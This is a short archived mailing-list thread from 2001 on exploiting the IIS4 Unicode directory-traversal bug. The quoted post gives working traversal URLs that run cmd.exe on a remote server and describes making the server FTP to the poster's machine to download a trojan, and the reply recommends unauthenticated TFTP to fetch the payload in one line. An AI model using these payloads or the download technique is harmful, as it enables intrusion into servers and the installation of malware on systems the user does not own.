Vulnerability Development mailing list archives
Re: unicode / iis4
From: Dave Loschiavo <dloschiavo () FRCC CC CA US>
Date: Sun, 7 Jan 2001 05:34:27 -0800
You should try TFTP instead. With TFTP you can put the entire command on a single line, and it doesn't require authentication. ----- Original Message ----- From: "Mad Zigy" <zigy () GLOBAL CO ZA> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Saturday, January 06, 2001 7:59 AM Subject: unicode / iis4
Well i have been able to use msadc2.pl yet the commands i give do not work. so i tried the other way by doing http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test .txt and all it did was say: The parameter is incorrect. so then i though maybe we cant have a > in the string so i found the hex of it and tried http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+% 3e+c:\test.txt yet it still gave me the same: The parameter is incorrect. I have been able to make it ftp into my pc by http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+hostname but i cant make it login as i need to echo a script which i can run http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+- s:c:\ftp.txt+hostname so that it will login and download the exe / trojan Thankz zigy!
Current thread:
- unicode / iis4 Mad Zigy (Jan 06)
- Re: unicode / iis4 Optical (Jan 07)
- Re: unicode / iis4 Dave Loschiavo (Jan 07)